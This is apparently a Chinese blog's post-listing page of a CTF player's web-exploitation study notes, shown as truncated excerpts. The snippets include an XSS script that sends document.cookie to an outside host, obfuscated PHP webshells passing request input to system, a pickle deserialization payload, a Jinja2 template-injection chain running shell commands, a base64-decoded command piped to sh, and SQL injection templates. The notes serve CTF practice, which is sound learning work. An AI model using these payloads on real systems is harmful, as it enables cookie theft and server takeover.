CTF
专注pwn0年
这个作者很懒,什么都没留下…
展开
-
CTFSHOW_SQL注入web249-253
试了其他文章的payload,没用成功,自己就写下来吧。做题有三点注意,url编码,加不加8080(有的脚本url里面加8080,如果不行就去掉,行就不管),用不用Burpsuite的Repeater(有的信息要用Repeater才能看见)原创 2022-08-19 20:41:42 · 231 阅读 · 0 评论 -
CTFSHOW_萌新计划web1-24
随便写一下。原创 2022-08-19 10:08:11 · 771 阅读 · 0 评论 -
CTFSHOW_WEB入门web213
查了弄了好久才弄出来,PHPSESSID在F12储存里面找。下面是ctfshowweb213.py。原创 2022-08-07 17:14:55 · 972 阅读 · 0 评论 -
2022/05/28
telnet和ping的区别ping用来检测网络连接速度telnet用来探测指定IP的端口的端口是否开放Phar反序列化在Windows上测试<?phpclass Test{ public $cmd="system('notepad');";}$p = new Test();$phar = new Phar("test.phar");//后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __H原创 2022-05-28 12:10:43 · 131 阅读 · 0 评论 -
2022/05/26
<?php highlight_file(__FILE__); require_once('flag.php'); if(isset($_GET['file'])) { require_once($_GET['file']);}payload为http://www.yuxuanzhe.com/?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc.原创 2022-05-26 11:50:26 · 133 阅读 · 0 评论 -
2022/05/25
[CISCN2019 华北赛区 Day1 Web1]Dropbox<?phperror_reporting(0);$dbaddr = "127.0.0.1";$dbuser = "root";$dbpass = "root";$dbname = "dropbox";$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);class User { public $db; public function __constr原创 2022-05-25 10:48:21 · 72 阅读 · 0 评论 -
2022/05/24
基础免杀分析<?php$a = "s#y#s#t#e#m";$b = explode("#",$a);$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];$c($_REQUEST[1]);?><?php$a=substr('1s',1).'ystem';$a($_REQUEST[1]);?><?php$a=strrev('metsys');$a($_REQUEST[1]);?><?php$a=$_R原创 2022-05-24 00:00:08 · 58 阅读 · 0 评论 -
2022/05/23
[CISCN 2019华东南]Web4原创 2022-05-23 13:41:51 · 133 阅读 · 0 评论 -
2022/05/21
basename()函数返回路径中的文件名部分在使用默认语言环境设置时,basename() 会删除文件名开头的非 ASCII 字符。ascii值为47、128-255的字符均可以绕过basename()其中47对应的符号为’/',在实际场景中没有利用价值那么也就是说我们可以利用一部分不可见字符来绕过basename()同时,在测试中也可以发现中文字符也是可以绕过basename()例如汉字、?、《、》、;等中文字符$_SERVER[’PHP_SELF’]http://www.exampl原创 2022-05-22 12:13:20 · 86 阅读 · 0 评论 -
2022/05/19
[CISCN2019 华北赛区 Day1 Web2]ikunapt-get install libssl-dev这一步出错了更新一下软件包就行了Python反序列化import pickleimport urllibclass payload(object): def __reduce__(self): return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())a = u原创 2022-05-19 19:16:38 · 108 阅读 · 0 评论 -
2022/05/17
[MRCTF2020]套娃Pwnhub五月公开赛wp学习1. TemplatePlay(模板注入)通过阅读jinja源码可以发现,jinja2内的undefined ,并非是python本身的而是自身修改过的并且继承自object,这样就可以直接使用此对象查找魔术方法,构造利用链。ads就是未定义的,未定义就可以很灵活{{ads.__init__.__globals__.__builtins__.__import__("os").popen("cat+config/flag.txt").read(原创 2022-05-17 20:37:59 · 2041 阅读 · 0 评论 -
2022/05/08无参数RCE
cmd=echo(show_source(end(scandir(next(str_split(zend_version()))))));原创 2022-05-08 19:51:44 · 69 阅读 · 0 评论 -
2022/05/03
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3原创 2022-05-03 18:26:56 · 67 阅读 · 0 评论 -
2022/04/28
sql注入通过handler1';handler Tablename open;handler Tablename read first;handler Tablename close;原创 2022-04-28 10:42:58 · 205 阅读 · 0 评论 -
2022/04/25
.phtml和.php[空格]文件上传原创 2022-04-25 11:13:42 · 169 阅读 · 0 评论 -
2022/04/14
echo$IFS$9dGFjIGZsYWcucGhw|base64$IFS$9-d|sh记录一个命令执行的payload$IFS$9表示空格编码很重要把命令给sh原创 2022-04-14 11:43:35 · 58 阅读 · 0 评论 -
2022/03/16bugkusql
bugku ctf sql原题地址wp根据wp猜测它应该只有一个表只有一个字段,那个字段的值就是flag对于登录的检查是看字符串是不是等于那个值没有真的在数据库里面查找真正的username=adminpassword=bugkuctf但是表里面没有这个字段因为wp里面没有截取记录行只有一行数据就是flag...原创 2022-03-16 13:10:10 · 690 阅读 · 0 评论 -
2022/03/14ctfshow卷王杯easy unserialize
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla原创 2022-03-14 15:39:49 · 372 阅读 · 0 评论 -
2022/03/12开会分享经验
burp suite抓包确定页面比如sql注入注入页面,文件上传页面扫目录hackbar与burp suitesql注入post注入方法反序列化危险函数原创 2022-03-12 22:38:36 · 3688 阅读 · 0 评论 -
2022/01/30ctfshow文件上传小结
一、修改前端代码 <button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'png'}">改为<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'php'}">二、抓原创 2022-02-25 19:45:49 · 333 阅读 · 0 评论 -
ctfshow_新春欢乐赛2022
不泄露wp每晚9点更新热身?f=phpinfo();web1web2原创 2022-02-03 16:46:41 · 943 阅读 · 0 评论 -
2022/1/14文件包含小结
伪协议编码session文件上传原创 2022-01-14 15:48:45 · 207 阅读 · 0 评论 -
2022/1/5ctfshowXSS小结
测试输入框用户名密码等会写JavaScript外带burp suite找到处理页面外带<script>window.location.href='http://www.yuxuanzhe.com/x.php?1='+document.cookie;</script>处理后外带<script>window.open('http://www.yuxuanzhe.com/tmp/flag.txt'+document.getElementsByClassName原创 2022-01-05 10:50:07 · 373 阅读 · 0 评论 -
2021/11/22-2021/11CTFSQL注入小结ctfshow
常用函数group_concat()database()to_base64()hex()if()substr()char()regexp()floor()ceil()pi()ord()version()ascii()left()user()sleep()库表列information_schemainformation_schema.tablesinformation_schema.columnsinformation_schema.schematainforma原创 2021-11-22 16:16:19 · 457 阅读 · 0 评论 -
2021/11/2sqlmap
python sqlmap.py原创 2021-11-02 11:25:53 · 68 阅读 · 0 评论 -
2021/10/30python在ctf应用
数据操作获取网页内容获取respond发送GET发送POST发送COOKIE普通盲注原创 2021-10-30 20:20:42 · 176 阅读 · 0 评论 -
2021/10/30CTF爆破小结ctfshow
burp suite设置Authorization: Basic YWRtaW46MTIz解密的admin:123设置为散弹模式改为解密后的payload set1 suffix意思是后缀payload set2开始爆破子域名爆破子域名查询网站https://phpinfo.me/domain伪随机数爆破程序下载地址https://www.openwall.com/php_mt_seed/点击进行下载,使用见web24视频...原创 2021-10-30 11:35:20 · 133 阅读 · 0 评论 -
2021/10/10
payload type:custom iterator原创 2021-10-27 19:14:30 · 45 阅读 · 0 评论 -
2021/10/27--2021/10/29CTF命令执行ctfshow
eval($c);经过过滤,传入参数执行原创 2021-10-27 18:16:43 · 1590 阅读 · 0 评论 -
2021/10/23
命令执行重命名和拷贝绕过原创 2021-10-23 17:48:54 · 56 阅读 · 0 评论 -
2021/10/20
短标签原创 2021-10-20 13:15:28 · 56 阅读 · 0 评论 -
2021/10/17
web190原创 2021-10-17 14:06:48 · 39 阅读 · 0 评论 -
2021/10/14
1’or’1’=‘1’%23原创 2021-10-14 10:34:55 · 43 阅读 · 0 评论 -
2021/10/1SQL注入
+转义为空格原创 2021-10-13 14:29:27 · 67 阅读 · 0 评论 -
2021/10/9
git泄露以及有关git的知识linux原创 2021-10-09 09:27:00 · 55 阅读 · 0 评论 -
2021/10/6注入模板
一、获取列数1’ order by 1#二、获取数据库名等-1’ union se/**/lect null,user()#库select schema_name from information_schema.schemata表select schema_table from information_schema.tables where table_schema=库名字段select schema_column from information_schema.columns where转载 2021-10-06 21:59:10 · 50 阅读 · 0 评论 -
2021/10/5
HTTP 请求头中的 X-Forwarded-For原创 2021-10-05 17:40:27 · 52 阅读 · 0 评论 -
2021/10/3
比较生的点反引号的使用PHP反序列化PHP伪协议python模板注入python和linux基础原创 2021-10-03 16:46:56 · 64 阅读 · 0 评论